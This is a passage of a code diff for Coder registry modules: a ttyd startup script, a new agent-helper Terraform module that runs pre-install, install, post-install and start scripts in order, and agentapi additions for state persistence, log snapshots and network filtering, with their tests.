+        mv "$${TTYD_BIN}.tmp" "$${TTYD_BIN}"
+      fi
+      rmdir "$${LOCK_DIR}" 2> /dev/null || true
+    else
+      printf "Waiting for ttyd installation to complete...\n"
+      while [[ -d "$${LOCK_DIR}" ]] && [[ ! -f "$${TTYD_BIN}" ]]; do
+        sleep 0.5
+      done
+    fi
+  fi
+
+  printf "Installation complete!\n\n"
+fi
+
+if [[ -z "${COMMAND}" ]]; then
+  printf "No command specified, skipping ttyd startup.\n"
+  exit 0
+fi
+
+ARGS="-p ${PORT}"
+
+if [[ "${WRITABLE}" = "true" ]]; then
+  ARGS="$${ARGS} -W"
+fi
+
+if [[ "${MAX_CLIENTS}" -gt 0 ]] 2> /dev/null; then
+  ARGS="$${ARGS} -m ${MAX_CLIENTS}"
+fi
+
+if [[ -n "${BASE_PATH}" ]]; then
+  ARGS="$${ARGS} -b ${BASE_PATH}"
+fi
+
+if [[ -n "${ADDITIONAL_ARGS}" ]]; then
+  ARGS="$${ARGS} ${ADDITIONAL_ARGS}"
+fi
+
+TTYD_LOG_PATH="${LOG_PATH}"
+TTYD_LOG_PATH="$${TTYD_LOG_PATH/#\~/$${HOME}}"
+TTYD_LOG_DIR="$${TTYD_LOG_PATH%/*}"
+mkdir -p "$${TTYD_LOG_DIR}"
+
+printf "Starting ttyd in background...\n"
+printf "Running: ttyd %s -- %s\n\n" "$${ARGS}" "${COMMAND}"
+
+# shellcheck disable=SC2086
+ttyd $${ARGS} -- ${COMMAND} >> "$${TTYD_LOG_PATH}" 2>&1 &
+
+printf "Logs at %s\n" "$${TTYD_LOG_PATH}"

registry/coder/modules/agent-helper/README.md

@@ -0,0 +1,65 @@
+---
+display_name: Agent Helper
+description: Building block for modules that need orchestrated script execution
+icon: ../../../../.icons/coder.svg
+verified: false
+tags: [internal, library]
+---
+
+# Agent Helper
+
+> [!CAUTION]
+> We do not recommend using this module directly. It is intended primarily for internal use by Coder to create modules with orchestrated script execution.
+
+The Agent Helper module is a building block for modules that need to run multiple scripts in a specific order. It uses `coder exp sync` for dependency management and is designed for orchestrating pre-install, install, post-install, and start scripts.
+
+> [!NOTE]
+>
+> - The `agent_name` should be the same as that of the agentapi module's `agent_name` if used together.
+
+```tf
+module "agent_helper" {
+  source  = "registry.coder.com/coder/agent-helper/coder"
+  version = "1.0.0"
+
+  agent_id        = coder_agent.main.id
+  agent_name      = "myagent"
+  module_dir_name = ".my-module"
+
+  pre_install_script = <<-EOT
+    #!/bin/bash
+    echo "Running pre-install tasks..."
+    # Your pre-install logic here
+  EOT
+
+  install_script = <<-EOT
+    #!/bin/bash
+    echo "Installing dependencies..."
+    # Your install logic here
+  EOT
+
+  post_install_script = <<-EOT
+    #!/bin/bash
+    echo "Running post-install configuration..."
+    # Your post-install logic here
+  EOT
+
+  start_script = <<-EOT
+    #!/bin/bash
+    echo "Starting the application..."
+    # Your start logic here
+  EOT
+}
+```
+
+## Execution Order
+
+The module orchestrates scripts in the following order:
+
+1. **Log File Creation** - Creates module directory and log files
+2. **Pre-Install Script** (optional) - Runs before installation
+3. **Install Script** - Main installation
+4. **Post-Install Script** (optional) - Runs after installation
+5. **Start Script** - Starts the application
+
+Each script waits for its prerequisites to complete before running using `coder exp sync` dependency management.

registry/coder/modules/agent-helper/main.test.ts

@@ -0,0 +1,13 @@
+import { describe } from "bun:test";
+import { runTerraformInit, testRequiredVariables } from "~test";
+
+describe("agent-helper", async () => {
+  await runTerraformInit(import.meta.dir);
+
+  testRequiredVariables(import.meta.dir, {
+    agent_id: "test-agent-id",
+    agent_name: "test-agent",
+    module_dir_name: ".test-module",
+    start_script: "echo 'start'",
+  });
+});

registry/coder/modules/agent-helper/main.tf

@@ -0,0 +1,190 @@
+terraform {
+  required_version = ">= 1.0"
+
+  required_providers {
+    coder = {
+      source  = "coder/coder"
+      version = ">= 2.13"
+    }
+  }
+}
+
+variable "agent_id" {
+  type        = string
+  description = "The ID of a Coder agent."
+}
+
+data "coder_workspace" "me" {}
+
+data "coder_workspace_owner" "me" {}
+
+data "coder_task" "me" {}
+
+variable "pre_install_script" {
+  type        = string
+  description = "Custom script to run before installing the agent used by AgentAPI."
+  default     = null
+}
+
+variable "install_script" {
+  type        = string
+  description = "Script to install the agent used by AgentAPI."
+  default     = null
+}
+
+variable "post_install_script" {
+  type        = string
+  description = "Custom script to run after installing the agent used by AgentAPI."
+  default     = null
+}
+
+variable "start_script" {
+  type        = string
+  description = "Script that starts AgentAPI."
+}
+
+variable "agent_name" {
+  type        = string
+  description = "The name of the agent. This is used to construct unique script names for the experiment sync."
+
+}
+
+variable "module_dir_name" {
+  type        = string
+  description = "The name of the module directory."
+}
+
+locals {
+  encoded_pre_install_script  = var.pre_install_script != null ? base64encode(var.pre_install_script) : ""
+  encoded_install_script      = var.install_script != null ? base64encode(var.install_script) : ""
+  encoded_post_install_script = var.post_install_script != null ? base64encode(var.post_install_script) : ""
+  encoded_start_script        = base64encode(var.start_script)
+
+  pre_install_script_name  = "${var.agent_name}-pre_install_script"
+  install_script_name      = "${var.agent_name}-install_script"
+  post_install_script_name = "${var.agent_name}-post_install_script"
+  start_script_name        = "${var.agent_name}-start_script"
+
+  module_dir_path = "$HOME/${var.module_dir_name}"
+
+  pre_install_path  = "${local.module_dir_path}/pre_install.sh"
+  install_path      = "${local.module_dir_path}/install.sh"
+  post_install_path = "${local.module_dir_path}/post_install.sh"
+  start_path        = "${local.module_dir_path}/start.sh"
+
+  pre_install_log_path  = "${local.module_dir_path}/pre_install.log"
+  install_log_path      = "${local.module_dir_path}/install.log"
+  post_install_log_path = "${local.module_dir_path}/post_install.log"
+  start_log_path        = "${local.module_dir_path}/start.log"
+}
+
+resource "coder_script" "pre_install_script" {
+  count        = var.pre_install_script == null ? 0 : 1
+  agent_id     = var.agent_id
+  display_name = "Pre-Install Script"
+  run_on_start = true
+  script       = <<-EOT
+    #!/bin/bash
+    set -o errexit
+    set -o pipefail
+
+    mkdir -p ${local.module_dir_path}
+
+    trap 'coder exp sync complete ${local.pre_install_script_name}' EXIT
+    coder exp sync start ${local.pre_install_script_name}
+
+    echo -n '${local.encoded_pre_install_script}' | base64 -d > ${local.pre_install_path}
+    chmod +x ${local.pre_install_path}
+
+    ${local.pre_install_path} > ${local.pre_install_log_path} 2>&1
+  EOT
+}
+
+resource "coder_script" "install_script" {
+  agent_id     = var.agent_id
+  display_name = "Install Script"
+  run_on_start = true
+  script       = <<-EOT
+    #!/bin/bash
+    set -o errexit
+    set -o pipefail
+
+    mkdir -p ${local.module_dir_path}
+
+    trap 'coder exp sync complete ${local.install_script_name}' EXIT
+    %{if var.pre_install_script != null~}
+      coder exp sync want ${local.install_script_name} ${local.pre_install_script_name}
+    %{endif~}
+    coder exp sync start ${local.install_script_name}
+    echo -n '${local.encoded_install_script}' | base64 -d > ${local.install_path}
+    chmod +x ${local.install_path}
+
+    ${local.install_path} > ${local.install_log_path} 2>&1
+  EOT
+}
+
+resource "coder_script" "post_install_script" {
+  count        = var.post_install_script != null ? 1 : 0
+  agent_id     = var.agent_id
+  display_name = "Post-Install Script"
+  run_on_start = true
+  script       = <<-EOT
+    #!/bin/bash
+    set -o errexit
+    set -o pipefail
+
+    trap 'coder exp sync complete ${local.post_install_script_name}' EXIT
+    coder exp sync want ${local.post_install_script_name} ${local.install_script_name}
+    coder exp sync start ${local.post_install_script_name}
+
+    echo -n '${local.encoded_post_install_script}' | base64 -d > ${local.post_install_path}
+    chmod +x ${local.post_install_path}
+
+    ${local.post_install_path} > ${local.post_install_log_path} 2>&1
+  EOT
+}
+
+resource "coder_script" "start_script" {
+  agent_id     = var.agent_id
+  display_name = "Start Script"
+  run_on_start = true
+  script       = <<-EOT
+    #!/bin/bash
+    set -o errexit
+    set -o pipefail
+
+    trap 'coder exp sync complete ${local.start_script_name}' EXIT
+
+    %{if var.post_install_script != null~}
+    coder exp sync want ${local.start_script_name} ${local.install_script_name} ${local.post_install_script_name}
+    %{else~}
+    coder exp sync want ${local.start_script_name} ${local.install_script_name}
+    %{endif~}
+    coder exp sync start ${local.start_script_name}
+
+    echo -n '${local.encoded_start_script}' | base64 -d > ${local.start_path}
+    chmod +x ${local.start_path}
+
+    ${local.start_path} > ${local.start_log_path} 2>&1
+  EOT
+}
+
+output "pre_install_script_name" {
+  description = "The name of the pre-install script for sync."
+  value       = local.pre_install_script_name
+}
+
+output "install_script_name" {
+  description = "The name of the install script for sync."
+  value       = local.install_script_name
+}
+
+output "post_install_script_name" {
+  description = "The name of the post-install script for sync."
+  value       = local.post_install_script_name
+}
+
+output "start_script_name" {
+  description = "The name of the start script for sync."
+  value       = local.start_script_name
+}

registry/coder/modules/agent-helper/main.tftest.hcl

@@ -0,0 +1,271 @@
+# Test for agent-helper module
+
+# Test with all scripts provided
+run "test_with_all_scripts" {
+  command = plan
+
+  variables {
+    agent_id            = "test-agent-id"
+    agent_name          = "test-agent"
+    module_dir_name     = ".test-module"
+    pre_install_script  = "echo 'pre-install'"
+    install_script      = "echo 'install'"
+    post_install_script = "echo 'post-install'"
+    start_script        = "echo 'start'"
+  }
+
+  # Verify pre_install_script is created when provided
+  assert {
+    condition     = length(coder_script.pre_install_script) == 1
+    error_message = "Pre-install script should be created when pre_install_script is provided"
+  }
+
+  assert {
+    condition     = coder_script.pre_install_script[0].agent_id == "test-agent-id"
+    error_message = "Pre-install script agent ID should match input"
+  }
+
+  assert {
+    condition     = coder_script.pre_install_script[0].display_name == "Pre-Install Script"
+    error_message = "Pre-install script should have correct display name"
+  }
+
+  assert {
+    condition     = coder_script.pre_install_script[0].run_on_start == true
+    error_message = "Pre-install script should run on start"
+  }
+
+  # Verify install_script is created
+  assert {
+    condition     = coder_script.install_script.agent_id == "test-agent-id"
+    error_message = "Install script agent ID should match input"
+  }
+
+  assert {
+    condition     = coder_script.install_script.display_name == "Install Script"
+    error_message = "Install script should have correct display name"
+  }
+
+  assert {
+    condition     = coder_script.install_script.run_on_start == true
+    error_message = "Install script should run on start"
+  }
+
+  # Verify post_install_script is created when provided
+  assert {
+    condition     = length(coder_script.post_install_script) == 1
+    error_message = "Post-install script should be created when post_install_script is provided"
+  }
+
+  assert {
+    condition     = coder_script.post_install_script[0].agent_id == "test-agent-id"
+    error_message = "Post-install script agent ID should match input"
+  }
+
+  assert {
+    condition     = coder_script.post_install_script[0].display_name == "Post-Install Script"
+    error_message = "Post-install script should have correct display name"
+  }
+
+  assert {
+    condition     = coder_script.post_install_script[0].run_on_start == true
+    error_message = "Post-install script should run on start"
+  }
+
+  # Verify start_script is created
+  assert {
+    condition     = coder_script.start_script.agent_id == "test-agent-id"
+    error_message = "Start script agent ID should match input"
+  }
+
+  assert {
+    condition     = coder_script.start_script.display_name == "Start Script"
+    error_message = "Start script should have correct display name"
+  }
+
+  assert {
+    condition     = coder_script.start_script.run_on_start == true
+    error_message = "Start script should run on start"
+  }
+
+  # Verify outputs for script names
+  assert {
+    condition     = output.pre_install_script_name == "test-agent-pre_install_script"
+    error_message = "Pre-install script name output should be correctly formatted"
+  }
+
+  assert {
+    condition     = output.install_script_name == "test-agent-install_script"
+    error_message = "Install script name output should be correctly formatted"
+  }
+
+  assert {
+    condition     = output.post_install_script_name == "test-agent-post_install_script"
+    error_message = "Post-install script name output should be correctly formatted"
+  }
+
+  assert {
+    condition     = output.start_script_name == "test-agent-start_script"
+    error_message = "Start script name output should be correctly formatted"
+  }
+}
+
+# Test with only required scripts (no pre/post install)
+run "test_without_optional_scripts" {
+  command = plan
+
+  variables {
+    agent_id        = "test-agent-id"
+    agent_name      = "test-agent"
+    module_dir_name = ".test-module"
+    install_script  = "echo 'install'"
+    start_script    = "echo 'start'"
+  }
+
+  # Verify pre_install_script is NOT created when not provided
+  assert {
+    condition     = length(coder_script.pre_install_script) == 0
+    error_message = "Pre-install script should not be created when pre_install_script is null"
+  }
+
+  # Verify post_install_script is NOT created when not provided
+  assert {
+    condition     = length(coder_script.post_install_script) == 0
+    error_message = "Post-install script should not be created when post_install_script is null"
+  }
+
+  # Verify required scripts are still created
+  assert {
+    condition     = coder_script.install_script.agent_id == "test-agent-id"
+    error_message = "Install script should be created"
+  }
+
+  assert {
+    condition     = coder_script.start_script.agent_id == "test-agent-id"
+    error_message = "Start script should be created"
+  }
+
+  # Verify outputs
+  assert {
+    condition     = output.pre_install_script_name == "test-agent-pre_install_script"
+    error_message = "Pre-install script name output should be generated even when script is not created"
+  }
+
+  assert {
+    condition     = output.install_script_name == "test-agent-install_script"
+    error_message = "Install script name output should be correctly formatted"
+  }
+
+  assert {
+    condition     = output.post_install_script_name == "test-agent-post_install_script"
+    error_message = "Post-install script name output should be generated even when script is not created"
+  }
+
+  assert {
+    condition     = output.start_script_name == "test-agent-start_script"
+    error_message = "Start script name output should be correctly formatted"
+  }
+}
+
+# Test with mock data sources
+run "test_with_mock_data" {
+  command = plan
+
+  variables {
+    agent_id        = "mock-agent"
+    agent_name      = "mock-agent"
+    module_dir_name = ".mock-module"
+    install_script  = "echo 'install'"
+    start_script    = "echo 'start'"
+  }
+
+  # Mock the data sources for testing
+  override_data {
+    target = data.coder_workspace.me
+    values = {
+      id            = "test-workspace-id"
+      name          = "test-workspace"
+      owner         = "test-owner"
+      owner_id      = "test-owner-id"
+      template_id   = "test-template-id"
+      template_name = "test-template"
+      access_url    = "https://coder.example.com"
+      start_count   = 1
+      transition    = "start"
+    }
+  }
+
+  override_data {
+    target = data.coder_workspace_owner.me
+    values = {
+      id            = "test-owner-id"
+      email         = "test@example.com"
+      name          = "Test User"
+      session_token = "mock-token"
+    }
+  }
+
+  override_data {
+    target = data.coder_task.me
+    values = {
+      id = "test-task-id"
+    }
+  }
+
+  # Verify scripts are created with mocked data
+  assert {
+    condition     = coder_script.install_script.agent_id == "mock-agent"
+    error_message = "Install script should use the mocked agent ID"
+  }
+
+  assert {
+    condition     = coder_script.start_script.agent_id == "mock-agent"
+    error_message = "Start script should use the mocked agent ID"
+  }
+}
+
+# Test script naming with custom agent_name
+run "test_script_naming" {
+  command = plan
+
+  variables {
+    agent_id        = "test-agent"
+    agent_name      = "custom-name"
+    module_dir_name = ".test-module"
+    install_script  = "echo 'install'"
+    start_script    = "echo 'start'"
+  }
+
+  # Verify script names are constructed correctly
+  # The script should contain references to custom-name-* in the sync commands
+  assert {
+    condition     = can(regex("custom-name-install_script", coder_script.install_script.script))
+    error_message = "Install script should use custom agent_name in sync commands"
+  }
+
+  assert {
+    condition     = can(regex("custom-name-start_script", coder_script.start_script.script))
+    error_message = "Start script should use custom agent_name in sync commands"
+  }
+
+  # Verify outputs use custom agent_name
+  assert {
+    condition     = output.pre_install_script_name == "custom-name-pre_install_script"
+    error_message = "Pre-install script name output should use custom agent_name"
+  }
+
+  assert {
+    condition     = output.install_script_name == "custom-name-install_script"
+    error_message = "Install script name output should use custom agent_name"
+  }
+
+  assert {
+    condition     = output.post_install_script_name == "custom-name-post_install_script"
+    error_message = "Post-install script name output should use custom agent_name"
+  }
+
+  assert {
+    condition     = output.start_script_name == "custom-name-start_script"
+    error_message = "Start script name output should use custom agent_name"
+  }
+}

registry/coder/modules/agentapi/README.md

@@ -16,7 +16,7 @@ The AgentAPI module is a building block for modules that need to run an AgentAPI
 ```tf
 module "agentapi" {
   source  = "registry.coder.com/coder/agentapi/coder"
-  version = "2.0.0"
+  version = "2.3.0"
 
   agent_id             = var.agent_id
   web_app_slug         = local.app_slug
@@ -49,6 +49,86 @@ module "agentapi" {
 }
 ```
 
+## Task log snapshot
+
+Captures the last 10 messages from AgentAPI when a task workspace stops. This allows viewing conversation history while the task is paused.
+
+To enable for task workspaces:
+
+```tf
+module "agentapi" {
+  # ... other config
+  task_log_snapshot = true # default: true
+}
+```
+
+## State Persistence
+
+AgentAPI can save and restore conversation state across workspace restarts.
+This is disabled by default and requires agentapi binary >= v0.12.0.
+
+State and PID files are stored in `$HOME/<module_dir_name>/` alongside other module files (e.g. `$HOME/.claude-module/agentapi-state.json`).
+
+To enable:
+
+```tf
+module "agentapi" {
+  # ... other config
+  enable_state_persistence = true
+}
+```
+
+To override file paths:
+
+```tf
+module "agentapi" {
+  # ... other config
+  state_file_path = "/custom/path/state.json"
+  pid_file_path   = "/custom/path/agentapi.pid"
+}
+```
+
+## Boundary (Network Filtering)
+
+The agentapi module supports optional [Agent Boundaries](https://coder.com/docs/ai-coder/agent-boundaries)
+for network filtering. When enabled, the module sets up a `AGENTAPI_BOUNDARY_PREFIX` environment
+variable that points to a wrapper script. Agent modules should use this prefix in their
+start scripts to run the agent process through boundary.
+
+Boundary requires a `config.yaml` file with your allowlist, jail type, proxy port, and log
+level. See the [Agent Boundaries documentation](https://coder.com/docs/ai-coder/agent-boundaries)
+for configuration details.
+To enable:
+
+```tf
+module "agentapi" {
+  # ... other config
+  enable_boundary      = true
+  boundary_config_path = "/home/coder/.config/coder_boundary/config.yaml"
+
+  # Optional: install boundary binary instead of using coder subcommand
+  # use_boundary_directly        = true
+  # boundary_version              = "0.6.0"
+  # compile_boundary_from_source  = false
+}
+```
+
+### Contract for agent modules
+
+When `enable_boundary = true`, the agentapi module exports `AGENTAPI_BOUNDARY_PREFIX`
+as an environment variable pointing to a wrapper script. Agent module start scripts
+should check for this variable and use it to prefix the agent command:
+
+```bash
+if [ -n "${AGENTAPI_BOUNDARY_PREFIX:-}" ]; then
+  agentapi server -- "${AGENTAPI_BOUNDARY_PREFIX}" my-agent "${ARGS[@]}" &
+else
+  agentapi server -- my-agent "${ARGS[@]}" &
+fi
+```
+
+This ensures only the agent process is sandboxed while agentapi itself runs unrestricted.
+
 ## For module developers
 
 For a complete example of how to use this module, see the [Goose module](https://github.com/coder/registry/blob/main/registry/coder/modules/goose/main.tf).

registry/coder/modules/agentapi/agentapi.tftest.hcl

@@ -0,0 +1,108 @@
+mock_provider "coder" {}
+
+variables {
+  agent_id             = "test-agent"
+  web_app_icon         = "/icon/test.svg"
+  web_app_display_name = "Test"
+  web_app_slug         = "test"
+  cli_app_display_name = "Test CLI"
+  cli_app_slug         = "test-cli"
+  start_script         = "echo test"
+  module_dir_name      = ".test-module"
+}
+
+run "default_values" {
+  command = plan
+
+  assert {
+    condition     = var.enable_state_persistence == false
+    error_message = "enable_state_persistence should default to false"
+  }
+
+  assert {
+    condition     = var.state_file_path == ""
+    error_message = "state_file_path should default to empty string"
+  }
+
+  assert {
+    condition     = var.pid_file_path == ""
+    error_message = "pid_file_path should default to empty string"
+  }
+
+  # Verify start script contains state persistence ARG_ vars.
+  assert {
+    condition     = can(regex("ARG_ENABLE_STATE_PERSISTENCE", coder_script.agentapi.script))
+    error_message = "start script should contain ARG_ENABLE_STATE_PERSISTENCE"
+  }
+
+  assert {
+    condition     = can(regex("ARG_STATE_FILE_PATH", coder_script.agentapi.script))
+    error_message = "start script should contain ARG_STATE_FILE_PATH"
+  }
+
+  assert {
+    condition     = can(regex("ARG_PID_FILE_PATH", coder_script.agentapi.script))
+    error_message = "start script should contain ARG_PID_FILE_PATH"
+  }
+
+  # Verify shutdown script contains PID-related ARG_ vars.
+  assert {
+    condition     = can(regex("ARG_PID_FILE_PATH", coder_script.agentapi_shutdown.script))
+    error_message = "shutdown script should contain ARG_PID_FILE_PATH"
+  }
+
+  assert {
+    condition     = can(regex("ARG_MODULE_DIR_NAME", coder_script.agentapi_shutdown.script))
+    error_message = "shutdown script should contain ARG_MODULE_DIR_NAME"
+  }
+
+  assert {
+    condition     = can(regex("ARG_ENABLE_STATE_PERSISTENCE", coder_script.agentapi_shutdown.script))
+    error_message = "shutdown script should contain ARG_ENABLE_STATE_PERSISTENCE"
+  }
+}
+
+run "state_persistence_disabled" {
+  command = plan
+
+  variables {
+    enable_state_persistence = false
+  }
+
+  assert {
+    condition     = var.enable_state_persistence == false
+    error_message = "enable_state_persistence should be false"
+  }
+
+  # Even when disabled, the ARG_ vars should still be in the script
+  # (the shell script handles the conditional logic).
+  assert {
+    condition     = can(regex("ARG_ENABLE_STATE_PERSISTENCE='false'", coder_script.agentapi.script))
+    error_message = "start script should contain ARG_ENABLE_STATE_PERSISTENCE='false'"
+  }
+}
+
+run "custom_paths" {
+  command = plan
+
+  variables {
+    state_file_path = "/custom/state.json"
+    pid_file_path   = "/custom/agentapi.pid"
+  }
+
+  assert {
+    condition     = can(regex("/custom/state.json", coder_script.agentapi.script))
+    error_message = "start script should contain custom state_file_path"
+  }
+
+  assert {
+    condition     = can(regex("/custom/agentapi.pid", coder_script.agentapi.script))
+    error_message = "start script should contain custom pid_file_path"
+  }
+
+  # Verify custom paths also appear in shutdown script.
+  assert {
+    condition     = can(regex("/custom/agentapi.pid", coder_script.agentapi_shutdown.script))
+    error_message = "shutdown script should contain custom pid_file_path"
+  }
+}

registry/coder/modules/agentapi/main.test.ts

@@ -257,4 +257,465 @@ describe("agentapi", async () => {
     );
     expect(agentApiStartLog).toContain("AGENTAPI_ALLOWED_HOSTS: *");
   });
+
+  test("state-persistence-disabled", async () => {
+    const { id } = await setup({
+      moduleVariables: {
+        enable_state_persistence: "false",
+      },
+    });
+    await execModuleScript(id);
+    await expectAgentAPIStarted(id);
+    const mockLog = await readFileContainer(
+      id,
+      "/home/coder/agentapi-mock.log",
+    );
+    // PID file should always be exported
+    expect(mockLog).toContain("AGENTAPI_PID_FILE:");
+    // State vars should NOT be present when disabled
+    expect(mockLog).not.toContain("AGENTAPI_STATE_FILE:");
+    expect(mockLog).not.toContain("AGENTAPI_SAVE_STATE:");
+    expect(mockLog).not.toContain("AGENTAPI_LOAD_STATE:");
+  });
+
+  test("state-persistence-custom-paths", async () => {
+    const { id } = await setup({
+      moduleVariables: {
+        enable_state_persistence: "true",
+        state_file_path: "/home/coder/custom/state.json",
+        pid_file_path: "/home/coder/custom/agentapi.pid",
+      },
+    });
+    await execModuleScript(id);
+    await expectAgentAPIStarted(id);
+    const mockLog = await readFileContainer(
+      id,
+      "/home/coder/agentapi-mock.log",
+    );
+    expect(mockLog).toContain(
+      "AGENTAPI_STATE_FILE: /home/coder/custom/state.json",
+    );
+    expect(mockLog).toContain(
+      "AGENTAPI_PID_FILE: /home/coder/custom/agentapi.pid",
+    );
+  });
+
+  test("state-persistence-default-paths", async () => {
+    const { id } = await setup({
+      moduleVariables: {
+        enable_state_persistence: "true",
+      },
+    });
+    await execModuleScript(id);
+    await expectAgentAPIStarted(id);
+    const mockLog = await readFileContainer(
+      id,
+      "/home/coder/agentapi-mock.log",
+    );
+    expect(mockLog).toContain(
+      `AGENTAPI_STATE_FILE: /home/coder/${moduleDirName}/agentapi-state.json`,
+    );
+    expect(mockLog).toContain(
+      `AGENTAPI_PID_FILE: /home/coder/${moduleDirName}/agentapi.pid`,
+    );
+    expect(mockLog).toContain("AGENTAPI_SAVE_STATE: true");
+    expect(mockLog).toContain("AGENTAPI_LOAD_STATE: true");
+  });
+
+  describe("shutdown script", async () => {
+    const setupMocks = async (
+      containerId: string,
+      agentapiPreset: string,
+      httpCode: number = 204,
+      pidFilePath: string = "",
+    ) => {
+      const agentapiMock = await loadTestFile(
+        import.meta.dir,
+        "agentapi-mock-shutdown.js",
+      );
+      const coderMock = await loadTestFile(
+        import.meta.dir,
+        "coder-instance-mock.js",
+      );
+
+      await writeExecutable({
+        containerId,
+        filePath: "/usr/local/bin/mock-agentapi",
+        content: agentapiMock,
+      });
+
+      await writeExecutable({
+        containerId,
+        filePath: "/usr/local/bin/mock-coder",
+        content: coderMock,
+      });
+
+      const pidFileEnv = pidFilePath ? `AGENTAPI_PID_FILE=${pidFilePath}` : "";
+      await execContainer(containerId, [
+        "bash",
+        "-c",
+        `PRESET=${agentapiPreset} ${pidFileEnv} nohup node /usr/local/bin/mock-agentapi 3284 > /tmp/mock-agentapi.log 2>&1 &`,
+      ]);
+
+      await execContainer(containerId, [
+        "bash",
+        "-c",
+        `HTTP_CODE=${httpCode} nohup node /usr/local/bin/mock-coder 18080 > /tmp/mock-coder.log 2>&1 &`,
+      ]);
+
+      await new Promise((resolve) => setTimeout(resolve, 1000));
+    };
+
+    const runShutdownScript = async (
+      containerId: string,
+      taskId: string = "test-task",
+      pidFilePath: string = "",
+      enableStatePersistence: string = "false",
+    ) => {
+      const shutdownScript = await loadTestFile(
+        import.meta.dir,
+        "../scripts/agentapi-shutdown.sh",
+      );
+
+      const libScript = await loadTestFile(
+        import.meta.dir,
+        "../scripts/lib.sh",
+      );
+
+      await writeExecutable({
+        containerId,
+        filePath: "/tmp/agentapi-lib.sh",
+        content: libScript,
+      });
+
+      await writeExecutable({
+        containerId,
+        filePath: "/tmp/shutdown.sh",
+        content: shutdownScript,
+      });
+
+      return await execContainer(containerId, [
+        "bash",
+        "-c",
+        `ARG_TASK_ID=${taskId} ARG_AGENTAPI_PORT=3284 ARG_PID_FILE_PATH=${pidFilePath} ARG_ENABLE_STATE_PERSISTENCE=${enableStatePersistence} CODER_AGENT_URL=http://localhost:18080 CODER_AGENT_TOKEN=test-token /tmp/shutdown.sh`,
+      ]);
+    };
+
+    test("posts snapshot with normal messages", async () => {
+      const { id } = await setup({
+        moduleVariables: {},
+        skipAgentAPIMock: true,
+      });
+
+      await setupMocks(id, "normal");
+      const result = await runShutdownScript(id);
+
+      expect(result.exitCode).toBe(0);
+      expect(result.stdout).toContain("Retrieved 5 messages for log snapshot");
+      expect(result.stdout).toContain("Log snapshot posted successfully");
+      expect(result.stdout).not.toContain("Log snapshot capture failed");
+
+      const posted = await readFileContainer(id, "/tmp/snapshot-posted.json");
+      const snapshot = JSON.parse(posted);
+      expect(snapshot.task_id).toBe("test-task");
+      expect(snapshot.payload.messages).toHaveLength(5);
+      expect(snapshot.payload.messages[0].content).toBe("Hello");
+      expect(snapshot.payload.messages[4].content).toBe("Great");
+    });
+
+    test("truncates to last 10 messages", async () => {
+      const { id } = await setup({
+        moduleVariables: {},
+        skipAgentAPIMock: true,
+      });
+
+      await setupMocks(id, "many");
+      const result = await runShutdownScript(id);
+
+      expect(result.exitCode).toBe(0);
+
+      const posted = await readFileContainer(id, "/tmp/snapshot-posted.json");
+      const snapshot = JSON.parse(posted);
+      expect(snapshot.task_id).toBe("test-task");
+      expect(snapshot.payload.messages).toHaveLength(10);
+      expect(snapshot.payload.messages[0].content).toBe("Message 6");
+      expect(snapshot.payload.messages[9].content).toBe("Message 15");
+    });
+
+    test("truncates huge message content", async () => {
+      const { id } = await setup({
+        moduleVariables: {},
+        skipAgentAPIMock: true,
+      });
+
+      await setupMocks(id, "huge");
+      const result = await runShutdownScript(id);
+
+      expect(result.exitCode).toBe(0);
+      expect(result.stdout).toContain("truncating final message content");
+
+      const posted = await readFileContainer(id, "/tmp/snapshot-posted.json");
+      const snapshot = JSON.parse(posted);
+      expect(snapshot.task_id).toBe("test-task");
+      expect(snapshot.payload.messages).toHaveLength(1);
+      expect(snapshot.payload.messages[0].content).toContain(
+        "[...content truncated",
+      );
+    });
+
+    test("skips gracefully when TASK_ID is empty", async () => {
+      const { id } = await setup({
+        moduleVariables: {},
+        skipAgentAPIMock: true,
+      });
+
+      const result = await runShutdownScript(id, "");
+
+      expect(result.exitCode).toBe(0);
+      expect(result.stdout).toContain("No task ID, skipping log snapshot");
+    });
+
+    test("handles 404 gracefully for older Coder versions", async () => {
+      const { id } = await setup({
+        moduleVariables: {},
+        skipAgentAPIMock: true,
+      });
+
+      await setupMocks(id, "normal", 404);
+      const result = await runShutdownScript(id);
+
+      expect(result.exitCode).toBe(0);
+      expect(result.stdout).toContain(
+        "Log snapshot endpoint not supported by this Coder version",
+      );
+    });
+
+    test("sends SIGUSR1 before shutdown", async () => {
+      const { id } = await setup({
+        moduleVariables: {},
+        skipAgentAPIMock: true,
+      });
+      const pidFile = "/tmp/agentapi-test.pid";
+      await setupMocks(id, "normal", 204, pidFile);
+      const result = await runShutdownScript(id, "test-task", pidFile, "true");
+
+      expect(result.exitCode).toBe(0);
+      expect(result.stdout).toContain("Sending SIGUSR1 to AgentAPI");
+
+      const sigusr1Log = await readFileContainer(id, "/tmp/sigusr1-received");
+      expect(sigusr1Log).toContain("SIGUSR1 received");
+    });
+
+    test("handles missing PID file gracefully", async () => {
+      const { id } = await setup({
+        moduleVariables: {},
+        skipAgentAPIMock: true,
+      });
+      await setupMocks(id, "normal");
+      // Pass a non-existent PID file path with persistence enabled to
+      // exercise the SIGUSR1 path with a missing PID.
+      const result = await runShutdownScript(
+        id,
+        "test-task",
+        "/tmp/nonexistent.pid",
+        "true",
+      );
+
+      expect(result.exitCode).toBe(0);
+      expect(result.stdout).toContain("Shutdown complete");
+    });
+
+    test("sends SIGTERM even when snapshot fails", async () => {
+      const { id } = await setup({
+        moduleVariables: {},
+        skipAgentAPIMock: true,
+      });
+      const pidFile = "/tmp/agentapi-test.pid";
+      // HTTP 500 will cause snapshot to fail
+      await setupMocks(id, "normal", 500, pidFile);
+      const result = await runShutdownScript(id, "test-task", pidFile, "true");
+
+      expect(result.exitCode).toBe(0);
+      expect(result.stdout).toContain(
+        "Log snapshot capture failed, continuing shutdown",
+      );
+      expect(result.stdout).toContain("Sending SIGTERM to AgentAPI");
+    });
+
+    test("resolves default PID path from MODULE_DIR_NAME", async () => {
+      const { id } = await setup({
+        moduleVariables: {},
+        skipAgentAPIMock: true,
+      });
+      // Start mock with PID file at the module_dir_name default location.
+      const defaultPidPath = `/home/coder/${moduleDirName}/agentapi.pid`;
+      await setupMocks(id, "normal", 204, defaultPidPath);
+      // Don't pass pidFilePath - let shutdown script compute it from MODULE_DIR_NAME.
+      const shutdownScript = await loadTestFile(
+        import.meta.dir,
+        "../scripts/agentapi-shutdown.sh",
+      );
+      const libScript = await loadTestFile(
+        import.meta.dir,
+        "../scripts/lib.sh",
+      );
+      await writeExecutable({
+        containerId: id,
+        filePath: "/tmp/agentapi-lib.sh",
